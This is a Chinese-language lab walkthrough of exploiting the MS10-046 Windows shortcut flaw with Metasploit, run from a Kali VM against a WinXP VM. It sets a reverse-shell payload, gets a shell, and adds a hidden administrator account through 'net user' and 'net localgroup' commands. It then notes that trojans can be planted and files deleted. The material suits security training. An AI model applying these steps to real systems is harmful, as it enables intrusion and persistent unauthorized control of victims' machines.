原理:
利用WinXP、Windows2000、Windows2003、Windows Vista等系统存在的漏洞:Windows Shell中的漏洞可能允许远程执行代码,如果显示特制的快捷方式图标,则可能允许远程执行代码,成功利用此漏洞的攻击者拥有与本地用户相同的用户权限。
准备:
靶 机:VMware下的WinXP系统 IP:192.168.1.111
攻击主机:VMware下的Kali系统 IP:192.168.1.110
在WinXP系统中建立个共享文件夹,右击选择属性,点开共享,按下图设置
渗透提权过程:
Step1:进入metasploit
Step2:search寻找ms10_046攻击模块
Step3:使用第一个模块(use + 模块名称)
Step4:设置payload反弹
Step5:使用show options命令,查看需设置的参数
这里需要设置的是SRVHOST、LHOST
Step6:设置SRVHOST、LHOST参数
Step7:exploit生成链接
Step8:在WinXP系统访问\\192.168.1.110\BBsgRC\,就是访问共享文件夹
可以看出出现了两个快捷方式的文件
Step9:攻击成功
Step10:sessions -i 2,选择攻击模块
Step11:在WinXP系统中访问http://192.168.1.110:80/
Step12:攻击成功
Step13:sessions -i 3,选择攻击模块,shell进行提权
Step:14:net user查看WinXP系统用户
Step15:添加用户
net user test 789456123 /add
net localgroup Administrators test /add
Step16:查看test用户是否成功
之后就可以对该主机进行一些越权的操作了:可以对WinXP系统进行远程登录、可以在该主机放入木马文件、删除文件等。